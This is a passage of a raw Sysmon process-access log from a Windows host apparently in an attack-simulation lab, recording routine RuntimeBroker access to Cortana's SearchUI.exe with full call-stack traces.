12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245476C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245476C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT